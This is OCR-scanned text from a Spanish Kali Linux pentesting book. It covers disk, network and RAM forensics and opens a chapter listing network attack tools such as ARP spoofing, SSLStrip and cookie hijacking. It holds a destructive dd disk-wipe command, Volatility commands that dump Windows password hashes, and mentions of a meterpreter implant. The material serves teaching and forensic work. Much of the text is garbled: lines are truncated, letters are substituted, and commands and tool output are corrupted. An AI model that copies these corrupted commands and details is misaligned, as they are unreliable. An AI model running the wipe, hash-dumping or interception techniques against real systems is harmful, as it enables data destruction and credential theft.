rootgkali:-4 dd if=/dev/zero of-/dev/sdc bs=1M 
Kid: escribiendo «/dev/sdc»: No queda espacio en el dispositivo 
[201+0 registros leídos I 

00.0 registros escritos 

209715208 bytes (210 MB) copiados, 1,0407 s, 202 MB/s 


Imagen 07.01: Borrado seguro de un dispositivo. 


Este proceso se debe repetir como se comentó anteriormente varias veces según el estándar o po 
a seguir. Para este caso de estudio se repitió el proceso 3 veces. k 


Una vez que los dispositivos que almacenaran las copias se hayan tratado correspondi 
se procede a realizar las copias que se utilizaran para el estudio. Es importante recalcar 
se debe trabajar sobre el dispositivo original. Para hacer las copias se utiliza el siguiente 


Imagen 07,02: Copiado de unidad de estudio. 
Seguidamente y antes de comenzar el tratamiento se debe comprobar que las copias son idént 


original, haciendo una comprobación hash. Para ello están los comandos “md5sum” y “sha! 
los cuales son los más comúnmente utilizados. 1 
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3. Tratamiento 


Para el tratamiento de la información recolectada, Kali Linux tiene muchas herramientas ütiles. 
Una de ellas es el foremost, con ella se pueden extraer todos los ficheros de un tipo en particular, 
analizándolos no por su extensión sino por sus headers, footers, y estructura interna. Un ejemplo 
claro de ello sería si se tomara la copia realizada o la imagen y se quisieran extraer todas las imágenes 
de la unidad para analizarlas. Para ello se utilizaría el comando: 


"foremost -t [tipo de archivo] -i [imagen o copia que se analiza] -o fruta donde se almacenaran] " 


|rootgkali:-/miPrueba& cd Forense/jpg/ 


|rootükali:-/miPrueba/Forense/jpgf 15 


Imagen 07.03: Extrayendo las imágenes con foremost. 


esta manera se puede extraer cualquier tipo de archivo que se busque (pdf, txt, jpg, png, etcétera). 
imbién puede usarse Scalpel. Estas dos herramientas son muy útiles cuando se trata de realizar 
Data Carving. Este proceso consiste en extraer una serie de datos de un gran conjunto. Es una 
nica que se utiliza durante toda investigación forense cuando se analiza el espacio libre de un 
à de ficheros para extraer archivos, es decir, estas herramientas son capaces de extraer todos 
archivos que fueron borrados del dispositivo mientras no haya sido sobre escrito el sector donde 
almacenaba. Si se repite la misma prueba pero esta vez se ha borrado una de las imágenes es 
Бе ver el contenido del dispositivo: 


umberto сотрісе2 JPG complice jpg 


Imagen 07.05: Contenido de la unidad que se analiza. 


Puede observarse que hay solo 5 imágenes, pero al utilizar foremost y extraerlas todas del d 
se obtienen 6 en total. Puede observarse que hay una foto que se extrajo del dispositivo que ne 
encontraba, o al menos no se veía porque se había borrado sin embargo, foremost pudo recup 


Imagen 07.06: Fotos extraídas con foremost. 


Proof Of Concept: Análisis de una imagen 
Otra herramienta muy potente y utilizada en el mundo forense es Autopsy. Para ver su potene 
explicará su funcionamiento con un caso que pudiera ser real: 


La Brigada Especial de Delitos Informáticos ha sido requerida por la Policía. Ésta, llevaba 2 
detrás de terroristas, consiguiendo averiguar que en unos pocos días puede haber una enti 
armas entre 2 grupos terroristas para un posible atentado. Los "expertos de la policía han 
propios hallazgos antes de entregarle al perito el pendrive: 


- Sistema de Archivos: NTFS. 


- Información que se piensa puede existir en el pendrive: fecha y lugar de la 
Información sobre zulos. 


Para este caso forense se solicita al perito que responda, si es posible, a las siguientes cuestit ve 
interés para la resolución de la investigación: 

- Zulos que tienen y que contiene cada uno 

- Algün mensaje que se pueda recuperar en el dispositivo 


Para estudiar este dispositivo el perito utilizara Autopsy. Al ejecutar la herramienta se puede obset 
que en la terminal se arranca un servicio al cual acceder para utilizar la herramienta. 


Autopsy Forensic Browser 
http;//wew.Sleuthkit .org/autopsy/ 
ver 2 


Thu Apr 18 11:52:19 2013 
¡ocalhost 


an НТМ. browser on the remote host and paste this URL in it: 


http://Localhost :9999/autopsy 


Imagen 07.07: Iniciando el servicio de Autopsy. 
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| 
| Una vez que Autopsy está online, solo se accede al servicio a través del navegador de Internet 
| visitando “localhost:9999/Autopsy”. 


@ localhost 9999/autopsy 


Imagen 07.08: Home de la herramienta Autopsy. 


А continuación se crea un nuevo caso de estudio y se establece el nombre del caso, la descripción y 
los investigadores. 


TTE 
[prueba de concepto para atiro | 


LT re TA 
Imagen 07.09: Creando un nuevo caso en Autopsy. 


uidamente se identifica el investigador que va a trabajar en el caso y se crea un host donde se va 
hacer la copia de la imagen del pendrive que se va a estudiar. 


Imagen 07.10: Creando un nuevo host. 


vez creado el host e identificado al investigador, se debe especificar el archivo de la imagen que 
! Va a estudiar. Para ello hay que especificar la ruta de la imagen, si la imagen es una imagen de 
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disco о de una partición y el método de importación. Preferiblemente siempre se debe trabaj 
copias para garantizar la integridad de las evidencias. 


Imagen 07.11: Copia de la imagen para analizar. 


Luego se pasa a especificar los detalles de la imagen, como el formato, el punto de montaje 
comprobación de la integridad de los datos, se puede hacer una comprobación manual de 
la opción "calculate", o si ya está realizado el hash MD5 de la imagen original, especifi 
opción “add” y la herramienta se encarga de comprobar que los hashes coincidan. 


Imagen 07.12: Estableciendo los detalles de la imagen. 


Esto calculará el MDS de la imagen que fue copiada por Autopsy, y ya solo queda compararla co 
la imagen original. 


Imagen 07.13: MDS obtenido de la copia que genera Autopsy. 
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|rootükali:-4 md5sum /root/usb.dd 
[B76b86716bd0d22f828080ce7bfffc2da2  /root/usb.dd 


| Imagen 07.14: MDS obtenido de la imagen del USB original 


Una vez comprobadas que ambas imágenes son iguales, se procede al análisis de la información 
contenida en el pendrive. Se observa que todo el contenido del mismo se ha recuperado, y se 
observan carpetas que comienzan con el símbolo $, (en el sistema de archivos NTFS), las cuales no 
son visibles al usuario habitual. 


Pueden verse también 2 imágenes y un documento. Las fotos después de revisarse no tienen nada 
importante, sin embargo el documento resulta algo extraño por su peculiar nombre. A continuación 
se procede a la extracción del documento para analizarlo y al intentar abrirlo para ver su contenido 
este solicita una contraseña. Este comportamiento es algo sospechoso así que la investigación pasa 
a centrarse en él. 


Tras cientos de pruebas y transcurridas varias horas con el mismo documento, se descubre a través 
de un servicio de decodificación de base64, la decodificación de "enVsb3MK", cuyo nombre es 
"zulos". 


ONLINE AMPLE 
DECODING 


Imagen 07.15: Decodificación de la palabra. 


"Ahora el perito tiene en su poder un archivo .doc dé nombre “zulos”, lo que probablemente puede 
'Significar que allí este contenida toda la información de los zulos de la red terrorista, y el contenido 


de ellos. 


¡Dentro de las carpetas de sistema en el Autopsy se pudo ver una llamada “SOrphanFiles”. Dicha 
Carpeta generalmente contiene archivos eliminados de la unidad, a estos archivos se les denomina 
hivos huérfanos”. Una vez dentro de $OphanFiles puede observarse que la mayoría de 
archivos están vacíos, sin embargo los dos últimos parecen algo sospechosos, el tamaño del 
ivo es distinto a 0 por lo tanto el perito infiere que puede contener información útil y procede a 
lizarlos. El contenido de ambos archivos es algo extrafio. 
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Contents Of File: C:/4OrphanFiLes/OrphanFile-69 


0000000. 3132 3361 6263 2008 
: Contenido del primer archivo huérfano. 


Contents Of File; Ci/VOrphanFi Lew /OrphanF t-79 


mis 
CATRE 


Imagen 07.17: Contenido del segundo archivo huérfano, 


El contenido del primer archivo huérfano parece ser una representación hexadecimal, por і 
el perito utiliza el comando "xxd" para convertir el contenido del archivo y se obtiene el siguiel 


resultado. 


Imagen 07.18: Conversión de la representación hexadecimal. 


El resultado obtenido es “123abc.” Pero eso al perito no le dice nada por sí solo, por lo tanto 
centra en el segundo archivo. El contenido del segundo archivo si contiene una pista. Cada línea del 
archivo termina con “==”, lo cual le indica al perito que es una representación base64 de un 
así que utiliza la misma herramienta con la que convirtió el nombre del documento y obtiene 3 
muy interesantes. Analizando cada una de las líneas por separado se obtiene el siguiente resul! 


Imagen 07.19: Decodificación de la primera línea. 
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Imagen 07.20: Decodificación de la segunda linca. 


| 


29uZa | LcyB lbi Bve 3ZhbGRwCg== 


Imagen 07.21: Decodificación de la tercera linea, 


Ya con esto el perito logro identificar cuando se realizara la entrega, los únicos cabos sueltos que 
quedan son: el documento, y el “123аЬс.”. Luego de varias vueltas e intentos el perito relaciona 
ambas. ¿Y si el contenido del primer archivo huérfano es la clave del documento? 


Zulo 1 -> armas 
Zulo 2 -> explosivos 
Zülo 3 -> rehenes 


94-> 


Imagen 07.23: Contenido del documento "zulos". 


Una vez abierto el documento el perito consiguió la información faltante del caso, quedando en 
evidencia la eficiencia de esta herramienta para análisis forenses. 


Kali Linux tiene muchas otras herramientas para estudios forenses,-todas con un mismo objetivo, 
garantizar el análisis más exhaustivo posible y recuperar hasta el último fragmento de información 
- contenido en el dispositivo, y el respectivo estudio de la información obtenida. 
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Rifuiti por ejemplo, es una herramienta de análisis forense para la papelera de reciclaje. Una g 
cantidad de investigaciones de delitos informáticos requieren la reconstrucción de la papelera 
reciclaje, 


Un equivalente a esta herramienta pero para entornos GNU/Linux es Extundelere. Esta aplicació 
puede recuperar archivos borrados de una partición ext3 о ext4. Extundelete utiliza la informi 
almacenada en la tabla de partición para intentar recuperar los archivos que han sido borrados. 


Pasco es otra herramienta muy útil de recuperación. En este caso esta aplicación reporta la 
en un fichero con texto delimitado. Esta herramienta permite visualizar un archivo cualq 
detalladamente y de manera organizada. Muy utilizada para el análisis de caché, cookies y el 
de navegación. Otra opción interesante de esta herramienta es el modo “undelete”, que hace с 
omiso a la información que hay en la tabla Hash y reconstruye cualquier dato válido de acti, 
Gracias a esto recupera información que otras herramientas no logran rescatar. 


4. Forense de red 


El forense de red es la rama que se encarga de analizar, investigar y evaluar las acciones que hai 
sucedido en un segmento de red en un instante concreto. El forense de red intentará responder a la 
siguientes sentencias: 1 


- "Creemos que nos han robado " 

- "Creemos que nos están atacando " 

- "Creemos que alguien no es quien dice ser” 
- "Creemos que el servidor está apagado " 


¿Qué se debe analizar realmente en un forense de red? Esta pregunta tiene fácil respuesta, todo lc 
que circula por la misma. Dependerá del entorno y de los protocolos, es decir, ¿Se saben cómo һа! 
sucedido los acontecimientos? ¿Se conoce el protocolo? ¿Existe información pública? ¿Se р ede 
descifrar la información? 


Existen gran cantidad de protocolos, y el analista forense no tiene por qué conocer todos, pero i 
éste encuentra alguno que no conoce deberá estudiarlo y aprender su funcionamiento para prosegu 
con el análisis. 


Я 


Captura de evidencias en red 


La captura de evidencias en red se llevará a cabo con un sniffer, por ejemplo Wireshark. Hay qu 

tener en cuenta que se pueden generar archivos de cientos de MB, o incluso de GB, La configuraci 
que se puede establecer en un switch соп el fin de que éste envíe una copia de todos los paquetes ql 
pasan рог uno o más puertos se denomina mirroring-port. El puerto concreto que recibe el tráfi 
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de red se denomina monitor-port, este puerto podría ser otro switch o el destino final, es decir, un 
equipo con un sniffer. 


Esta configuración descrita es realmente ütil cuando se necesita monitorizar el tráfico de red para 
detectar intrusiones en la red corporativa o en un segmento dado. Una vez realizada la captura de 
evidencias se deberán aplicar distintos filtros que pueden ayudar a optimizar las búsquedas, dichos 
filtros se realizarán sobre una copia de la captura: 


- Realizar operaciones de limpieza para dejar la copia de la captura con la información más 
importante posible. 
- Analizar que no existen paquetes defectuosos en la copia de la captura. 


- Analizar de la capa inferior hacia la superior del protocolo ТСРЛР, si éste es el entorno 
en el que se encuentra el analista. 


- Si se conocen direcciones IP críticas sobre las que se quiere realizar el forense, aplicar 
filtros que simplifican айп más la captura anterior. De este modo se busca focalizar el análisis 
en ciertas direcciones IP y el comportamiento en la red de las máquinas de dichas direcciones. 


. Las herramientas utilizadas para la captura de evidencias en red son, como se ha mencionado 
anteriormente, simplemente sniffers. A continuación se muestra un listado de algunos disponibles 
en Kali Linux: 


- Wireshark. 
-  Tshark. 
- Tepdump. 


La herramienta Ts/ark es básicamente la línea de comandos de Wireshark reuniendo gran cantidad 
de funcionalidades que aporta Wireshark en el entorno gráfico. Además, permite la realización de 
scripting, por lo que es realmente ütil para la automatización de tareas. 


Por otro lado la herramienta Tcpdump es un clásico de los sniffers. Se encarga de volcar a un fichero 
о mostrar por pantalla todo el tráfico que está circulando por la tarjeta de red donde se configura. 


| / 

. Fingerprint 

- El Fingerprint es una técnica realmente útil en un análisis forense de red, ya que permite obtener 

| información importante del tráfico de гей que está llegando o llegó al equipo. El Fingerprint puede 
ser activo o pasivo. Los métodos activos realizarán alguna operación sobre una máquina concreta 
para obtener información de ella. Por otro lado los métodos pasivos utilizarán una captura de red o el 
tráfico que llega hasta la tarjeta para, a partir de dicha información, inferir la misma. La información 
que se suele obtener de dicho proceso suele ser el sistema operativo y en ocasiones su versión, 
los puertos abiertos, las versiones de productos que estén instalados, las versiones de protocolos, 

_ etcétera. 


Pentesting con j 


Kali Linux dispone de la herramienta pOf que es capaz de realizar un Fingerprint pasivo. 
lado para realizar un Fingerprint activo se pueden utilizar herramientas сото Nmap. La her 
pOf permite realizar las siguientes acciones: 

- Detectar la existencia de un posible balanceador de carga. 

- Detectar la presencia de sistemas cortafuegos. 

- Identificar qué tipo de conexión dispone el equipo remoto, por ejemplo, DSL, m 
etcétera. Asi como el proveedor de Internet. А 
- Distancia al sistema remoto y el tiempo de ejecución. 


Гоот@ка11:-# par -i еһе 
pOf - passive os fingerprinting utility, version 2.8.8 

(С) М. Zalewski <lcamtufedione.cc>, М. Stearns «wstearnsgpobox.com» 

pof: listening (SYN) on 'ethó', 262 sigs (14 generic, cksum GFIFSCA2), rule: 


[192.168.0.62:1073 - Windows XP SPl«, 2008 SP3 
-> 192.168.0.64:4444 (distance 0, link: ethernet/modem) 
[192.168.0.62:1073 - Windows XP SPl«, 2000 SP3 
-» 192.168.0.64:4444 (distance Ө, link: ethernet/modem) 
1192.168.0.62:1073 - Windows XP SPl«, 2000 SP3 


Imagen 07.24: Ejemplo de uso de pf. 


-s file ] [ -o file ] 

-u user ] [ -FXVNDUKASCMROqtpvdlrx ] 
1 ] [ 'filter nie' ] 
-t file - read fingerprints from file 

-i device - listen on this device 


age: pOf [ -f file] [ -i оца] [ 
(ем fite ] [ -Q sock [ mn 


s file - from tcpdump snapshot 

-o file - logfile (implies -t) 

-w file to tcpdump snapshot 

-u user - chroot and setuid to this user 

-Q sock  - listen on local socket for queries 

EJ make src port 8 a wildcard (in query mode) ' 
-е ns рсар capture timeout in milliseconds (default: 1) 

-c size cache size for -Q and -M options 

-M run masquerade detection 


-Tnn - set masquerade detection threshold (1-200) 


E] verbose masquerade flags reporting 
-F use fuzzy matching (do not combine with -R) 
-N do not report distances and link media 

-D do not report OS details (just genre) 

-U - do not display unknown signatures 

- do not display known signatures (for tests) 
-S - report signatures even for known systems 
-A go into SYN+ACK mode (semi-supported) 

-R go into RST/RST+ACK mode (semi-supported) 


resolve host names (not recommended) 


-0 - go into stray ACK mode (barely supported) 
- be quiet - no banner 


y - enable support for 802.10 VLAN frames 
-p - switch card to promiscuous mode 

-d - daemon moda (fork into background) 

А - use single-line output (easier"to grep) 


include full packet dump (for debugging) 
- display payload string (useful in RST mode) 


Imagen 07.25: Parámetros de pOf. 


l 
i 
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Proof Of Concept: Los grupos hacktivistas y la red 

En esta prueba de concepto se presenta un escenario, que podría ser perfectamente real, Tras una 
investigación abierta, la Benemérita llegó a la conclusión de que varios de los acusados, tenían una 
posible relación con grupos hacktivistas de Anonymous, los cuales se comunicaban mediante canales 
IRC públicos, para la organización del modus operandi. Se ha conseguido rescatar una captura de 
tráfico de red en un fichero pcap del equipo de uno de los supuestos miembros, a la cual se accedió 
mediante un meterpreter inyectado en dicha máquina. Para finalizar el caso queda pendiente revisar 
la captura de red, esta acción deberá llevarla a cabo un analista forense. 


Se solicita al perito que responda a las siguientes cuestiones de interés para la resolución de la 
investigación: 

- (Qué dirección IP y nickname utiliza еп el canal IRC para comunicarse con los miembros 

el sospechoso? 

- ¿Envió algún mensaje el usuario por IRC? ¿A qué sala? 

- (Qué más protocolos interesantes aparte del IRC se encuentran en la captura? 

- (Qué versión del protocolo anterior mencionado se ejecuta en la máquina servidora? 

- (Aparece algún login en la conexión sin cifrar? 

- ¿A qué carpeta y dirección IP se envían los documentos? 

- ¿Cuál es el documento más relevante en la muestra? 

- Se puede visualizar el contenido de los documentos hay que obtenerlo? 

- (Qué nombre tenía el fichero sobre el sistema y que aplicación lo ejecuta? 


En primer lugar el fichero pcap llega a manos del analista forense, el cual realizará una copia de 
dicho archivo y realizará hashing sobre ella para determinar que no hay cambios sobre las pruebas. 
Una vez realizado este trámite, el analista forense decide evaluar con Kali Linux la prueba y para ello 
utiliza la herramienta Wireshark con el fin de visualizar su contenido. 


La dirección IP y el nickname del usuario es fácil de conocer ya que Wireshark permite ejecutar un 
filtro de tipo IRC. Como se puede visualizar en la imagen filtrando por el protocolo IRC se obtienen 
una serie de paquetes de dicho protocolo, entre к primeros se encuentra su nickname, el cual fue 
introducido al realizar la conexión. 


Relay chat Е: 
Request: NICK Anoné4bits 
Imagen 07.26: Obtención de nickname. 


A continuación y siguiendo соп la investigación de la captura se puede obtener si el usuario 
algún mensaje al chat y la sala, gracias a que existe un гає en el protocolo IRC para los 
privados, como es PRIVMSG. El filtro utilizado es IRC contains PRIVMSG, y los resultados, 
como se puede visualizar en la imagen, son el descubrimiento del mensaje “ya está el comunica 
en la sala winsock. - 


E Request: PRIWSG #winsock :Ya esti3031241 el comunicado preparado }; 
E 
8 Command paramet: 
Trailer: Ya est 303 V241. el comunicado preparado };) 


Imagen 07.27: Recuperación del mensaje privado. 


El analista forense debe buscar todos los detalles en esta captura por lo que investigando se pi 
encontrar, tal y como se ve en la imagen, que existen otros protocolos interesantes, en este caso. 
Además, se puede visualizar la dirección IP de la máquina servidora así como la versión del i 
Este hecho podría ser una vía para comprobar la seguridad del producto y la máquina que tiene 
servicio instalado. 


е 
= 220-rilezilla Server version 0.9.41 bet 
220-wrítten by Tim Kosse (Tia. kossesgx. de) 
do Flame атада AMI 


Imagen 07.28: Descubrimiento de servicios y versiones. 


Durante la investigación al protocolo FTP se puede detectar algün /ogin que no se encuentre 
ya que FTP es un protocolo inseguro. En la imagen se pueden visualizar las credenciales de acceso 
al servidor FTP anteriormente mencionado. 


Imagen 07.29: Obtención de credenciales del servidor FTP. 
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Si se sigue analizando la captura, el analista forense podrá descubrir que el usuario se /oguea en 
un servidor FTP con el fin de obtener 0 subir un archivo. Si se sigue investigando se obtiene que el 
usuario sube un archivo al servidor, en concreto a la carpeta keylogs. El documento que se sube tiene 
por nombre Keys Apr 30 2012 16 10 02.html. 


(s current directory. Vr. 
Response code: Requested File action okay, completed (250) 
Response arg: cwo successful. "/keylogs" is current directory. 


Imagen 07.30: Cambio de directorio y subida de archivo. 


Una vez localizado el documento en la captura se debe extraer como prueba, por lo que se utilizará 
la opción Follow TCP Stream con Wireshark -> Save As -> Fichero.html, en dónde se encuentra 
el primer paquete FTP Data que se envía desde el usuario hacia el servidor. Una vez extraído el 
fichero se puede visualizar su contenido, y se observa el comunicado, además del fichero original y 
la aplicación utilizada para abrirlo. 


Imagen 07.31: Extracción del comunicado. 


_5. Forense de RAM j 


Dentro del apartado forense de RAM, Kali Linux ofrece dos herramientas conocidas como son 
Volafox, para trabajar con volcados de memoria de máquinas MacOS X y Volatility Framework, el 
- Cual permite la extracción de información sobre volcados de máquina de sistemas Windows. Ambas 
aplicaciones están desarrolladas en Python, con lo que facilitan la integración sobre cualquier 
- Sistema operativo. Para incluir un caso práctico en el libro, se ha decidido realizar las pruebas sobre 
“el volcado de una máquina MS Windows XP SP2, con lo que la herramienta estrella será Volatility. 
Entre las opciones de extracción que brinda este framework, se pueden destacar las siguientes: 


- Tipo de sistema, fecha y hora. 
- Procesos que se estaban ejecutando. 


Puertos abiertos. 
- Puertos conectados. 

- DLLs cargadas por proceso. 

- Ficheros cargados por procesos. 

- Claves del registro utilizadas en los procesos. 
- Módulos del kernel. 

- Mapa fisico de offsets a direcciones virtuales. 
- Direccionamiento de memoria por proceso. 

- Extracción de ejecutables. 


Para explotar satisfactoriamente todas estas opciones, es necesaria la utilización del gran nú 
plugins que vienen por defecto en Volatility. Uno de los desarrolladores de plugins más 
es Brendan Dolan, el cual los hace públicos de forma gratuita en su página: Attp;//www: 
edu/-brendan/volatility/ 


A continuación se muestra, uno de sus plugins extrayendo información acerca de las cuente: 
usuario de los propios procesos. 
Volatility Framework 2.1 
-18 (Local System) 


5-18 (Local System) 
5-32-544 (Administrators) 
-1-1-9 (Everyone) 


:veryone] 
ar (Authenticated Users) 


-32-544 (Administrators) 

8 (Everyone) 

-11 (Authenticated Users) 
-1-5-18 (Local System) 
-1-5-32-544 (Administrators) 
-1-1-0 (Everyone) 

-5-11 (Authenticated Users) 
-5-18 (Local System) 
-5-32-544 (Administrators) 
-l-i 

5- 


В (Local Sys 
-32-544 (Administrators) 


Imagen 07.32: GetSids. 
Otra de las opciones ütiles a destacar, es sin duda la de realizar un árbol de aplicaciones en eje 


con pstree, para identificar inclusive sus pid e interactuar mediante otros plugins con los p 
encontrados. 
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238 1978-81-01 

19 2012-05-03 

345 2012-05-03 

+ 0x80dd5020 :winlogon 455 2812-85-03 
. 0x80d76da0 :msdcsc .exe 1 90 2012-05-03 
^ 32 2012-85-03 
243 2012-05-03 


"82 2012-05-03 
206 2012-05-03 
77 2012-85-03 
106 2012-85-03 
107 2012-05-03 
198 2012-05-03 
166 2012-05-03 
s... Oxffag46al 1098 2012-05-03 
8x88d474t 8. 2012-05-03 
Ox8Gd4 fdad :wscnt fy 2 28 2812-85-03 

. üxBOdaf260:lsass.exe 6 Ho 337 2012-05-93 


Imagen 07.33: pstree. 


La posibilidad de ver las conexiones realizadas en el momento de la captura de RAM, es sencilla 
gracias al plugin sockets. Este permitirá en un forense de malware, identificar fácilmente los puertos 
abiertos y conexiones realizadas en el momento de la captura. 


то ор, 
о\ат11е "Bystes Volatility Frases ric EN 1 
Offset (ү) PID Port Proto Protocol Create ¿das 


Oxffa3de98 .168.8. 2012-05- өз 
6.9.0.9 2012-05-03 

2012-05-03 

2912-05-03 

2012-95-03 

2012-05-03 

2012-05-03 


Imagen 07.34: Sockets. 


Otra de las posibilidades, es la de extracción de los hashes de usuarios del sistema, que contiene la 
imagen de la memoria. Esta es posible utilizando dos plugins. Uno de ellos es hivelist, que mediante 
'egrep en Linux, filtra resultados para que la consola tan solo muestre las direcciones de memoria 
donde se alojan los ficheros de SAM y System. 


Vol -f /root/Desktop/dialog.mem hivelist | естер 'SAMS|system$) " 


Рхе1За31а8 0x08c6b1a8 VeviceViarddiskloluno) WINDDIS systen32 config 
0x948471f0 XDev: 


pem. 0735: vm y uim 


Utilizando las direcciones de memoria que hivelist ha extraído de la imagen, es posible 
combinación junto con el plugin hasdump, para el volcado de los hashes. 


Vol -f /root/Desktop/dialog.mem hashdump —y'0xe10181f0 -s 0xel3a31a8 


platile Systems Volatility Р 
dninistrador:500:8735172c3a77d2c 


tente de ayuda 7 es ec 
IPPORT 38B94520:1 494 dcir sio e ler PRADA, 
Papo: 1983:8735172c3a77d2c! H 7с 3b558Bc а facScOae969: : 


Imagen 07.36: Extracción de hashes con Hashdump. 


Además, Volatility permite al forense realizar volcados de ejecutables y librerías que se encuet 
en ejecución, con lo que herramientas como procdump o dlIdump, hacen esta tarea aún más 
A continuación se muestra una imagen en la que mediante el plugin dlllist, se consigue un lit 


PONRPROF tT 
орка игй vol -f /root/Desktop/dislog.ses dildump -D /root/Desktop/ --base™0x74a60000 -pidii 
слале Systens Volatility Framswurk 
Process(V) Name ase подле Nase 


Imagen 07,37: Volcado de librería a disco, 
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Capítulo УШ 
Ataques a redes 


Kali Linux dispone de herramientas para husmear y envenenar redes. Estas herramientas ayudan al 
tester a monitorizar y controlar el tráfico de otros elementos de la red como pueden ser equipos, 
servidores o teléfonos con VOIP. 


Еп una auditoría interna estas herramientas pueden ayudar y mucho a conseguir información 
privilegiada que viaja por la red, o incluso a conseguir credenciales que ayuden al auditor a elevar 
privilegios en el dominio de la red. 


En este capítulo se estudiarán las diferentes herramientas que Kali Linux proporciona al pentester 
este tipo de situaciones y se detallarán ciertas pruebas de concepto las cuales son realmente 
eresantes. 


Envenenamiento de redes. 
- Herramientas VOIP. 

- Husmeando la web. 

- Husmeando redes. 

- Voz y vigilancia. 

п el envenenamiento de redes el objetivo del pentester es conseguir que el tráfico de la o las 
imas pase por él. El principal problema es el direccionamiento que la víctima esté utilizando, es 


ecir, si la víctima utiliza el protocolo IPv4 o IPv6. Kali Linux presenta una serie de herramientas 
cada uno de los protocolos con las que el pentester conseguirá dicho objetivo. 


Más adelante se hablará en detalle de los escenarios y mediante la ejecución de una prueba de 
epto se instruirá el cómo llevar a cabo dicha acción. ‚ 


A continuación se muestra un listado de herramientas comunes para el envenenamiento de red 
independientemente de si son para el protocolo IPv4 o IPv6: 


- Arpspoof. Esta herramienta permite realizar la técnica ARP Spoofing en una red IPv4, 
objetivo de la aplicación es envenenar las tablas ARP de un objetivo respecto a otra máqui 
con ello el atacante se hará pasar ante el objetivo por otra máquina. Un ejemplo clásico ser 
envenenar a una måquina para indicar que el router ha cambiado su dirección MAC y 
ahora la dirección MAC del router es la del equipo del pentester. 

- SSLStrip. Esta herramienta permite'realizar la técnica SSL Strip, con la que un 
puede realizar un MITM especial, apoyándose en ААР Spoofing. Este MITM 
consiste en que la conexión entre la víctima y el atacante va por protocolo no seguro 
la conexión con el servidor de verdad va con HTTPS. La víctima notará en su пауерг 
los sitios donde antes aparecía HTTPS ahora ya no aparecerá. 

- Ettercap. Esta herramienta permite realizar un ataque de ARP Spoofing. Lo interes 
que proporciona una GUI y un sistema de filtros desarrollables por el pentester en fi 
de lo que necesite. 
- Yersinia. Esta herramienta trabaja en capa 2 y permite testear la posibilidad de saltar d 
VLAN. Con esta herramienta se podrá realizar ataques a switches y testear la viabilidad pa 
lograr evitar las medidas de protección en las redes de éstos. Yersinia es compatible con 
switches CISCO con los que por ejemplo se puede saltar de VLAN gracias al protocolo: 
si éste se encuentra habilitado por defecto. 

- Parasite6. Esta herramienta permite realizar un ataque MITM en redes con protocol 
IPv6 mediante el uso del protocolo ICMPv6 para cambiar las “tablas de vecinos". ' 
- Fake router6. Esta herramienta permite realizar un ataque de tipo SLAAC en re 
IPv6 mediante los RA, (Router Advertisement). Con este tipo de aplicación un equipo рие 
anunciarse en la red como si fuera un router, por lo que otorgará dirección IP, DNS y p 
de enlace a otros equipos de la red. Con esta posibilidad es realmente sencillo realizar i 
ataque MITM a otros equipos de la red. 

- Evilgrade. Este framework permite comprometer equipos a través de actualizacion 
falsas. El framework necesita que antes el atacante haya realizado ARP Spoofing, Di 
Spoofing, configuración de un punto de acceso Wireless falso, secuestro de DHCP o cualqi 
otra manera que permita al atacante interceptar el tráfico de la víctima. Es posible cons 
el control total de una máquina que se encuentre completamente actualizada en un test de 
intrusión. 

- Macchanger. Permite cambiar la dirección MAC del adaptador fisico de red. 

- DNSChef Esta herramienta es capaz de ejecutar un DNS Proxy o fake DNS y manipular 
tramas de peticiones o respuestas del protocolo DNS. Se puede interceptar una petición DNS 
a un dominio y redireccionar dicho dominio a una dirección IP local donde poder analiza 
о incluso inyectar una backdoor aprovechando alguna vulnerabilidad del navegador. 
herramienta dispone de soporte para IPv6, con lo que ayuda a comprobar la seguridad 
este soporte. 
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Para sniffar o husmear la información que se puede consultar a través de la web existen diversas 
herramientas englobadas en este apartado. A continuación se detallan las más relevantes e interesantes 
para el pentester: 


| 
| 


- Drifinet. Esta herramienta permite mostrar “on the fly” las imágenes que una víctima está 
visualizando en su navegación. Por debajo el atacante está realizando alguna técnica para que 
las imágenes pasen por él, como por ejemplo, ARP Spoofing. 
- DNSSpoof. Esta herramienta permite realizar la técnica de DNS Spoofing sobre una 
víctima, siempre y cuando por debajo se esté redireccionando el tráfico de ésta por el 
atacante. Con esta aplicación cuando la víctima realice peticiones DNS, el atacante podrá 
manipular dicha información y devolver resoluciones falsas con el objetivo de falsear la 
dirección IP devuelta. Es un punto de inflexión para realizar phishing de manera sencilla 
gracias al servidor DNS falso. 
- Ferret. Es un sniffer que captura cookies almacenándolas en un archivo de texto o PCAP. 
Se complementa con otra aplicación denominada Hamster, la cual se encarga de abrir en 
Firefox ese archivo y dar la posibilidad al atacante de acceder a los sitios con las cookies 
obtenidas. Hay que recordar que se necesita de un ataque ARP Spoofing que permita al 
atacante procesar el tráfico de la víctima y obtener, en este caso, las cookies de sesión. 
- MITMProxy. Es un Proxy que permite interceptar y modificar tráfico HTTP mediante un 
ataque de MITM. Además, permite almacenar el tráfico HTTP e interceptar los certificados 
SSL generados. 
- URLSnarf. Esta herramienta filtra las peticiones de tráfico HTTP y lo muestra por 
pantalla. Permite realizar un seguimiento de la navegación de la víctima y las peticiones que 
ésta realiza. Puede ser ütil si se necesita realizar alguna acción sobre el tráfico de la víctima y 
visualizar rápidamente los resultados con esta herramienta, por ejemplo, cambiar User-Agent 
con Ettercap y visualizar las nuevas peticiones con URLSnarf. 
- WebMITM. Esta herramienta permite generar certificados falsos personalizados y 
autofirmados, como realiza la herramienta de Windows Cain & Abel. El objetivo es que 
mediante la realización de un MITM a la víctima y DNS Spoofing ésta finalice realizando la 
petición de un sitio web al atacante y éste le proporcionará un certificado falso, el cual si la 
víctima acepta, cifrará la conexión con el atacante, por lo que sus credenciales quedarán a la 
vista de éste. , 
Para sniffar o husmear la información que se puede consultar en una red de datos, Kali Linux 
proporciona un listado de herramientas que se detallan a continuación: 
- Dsniff Esta herramienta permite sniffar el tráfico y filtrar credenciales de protocolos 
inseguros. Además, es el nombre de la suite que dispone de diferentes herramientas para 
aplicar filtros a distintas funcionalidades como por ejemplo, obtención de cookies, filtrado de 
peticiones, mails, imágenes, etcétera. 
- Hexinject. Esta herramienta permite sniffar e inyectar en el tráfico. Esta inyección permite 
modificar el tráfico real por información falsa, por ejemplo la modificación del tráfico ARP, 


la inclusión de información falsa en un envío de un correo electrónico, la modif 
protocolo HTTP y la información de éste, etcétera. Es una herramienta realmente inte 
-  Mailsnarf. Esta herramienta permite sniffar el correo electrónico que utiliza los pu 
SMTP y POP. 

- Migsnarf. Esta herramienta permite sniffar el tráfico del chat, como por 
Messenger. 

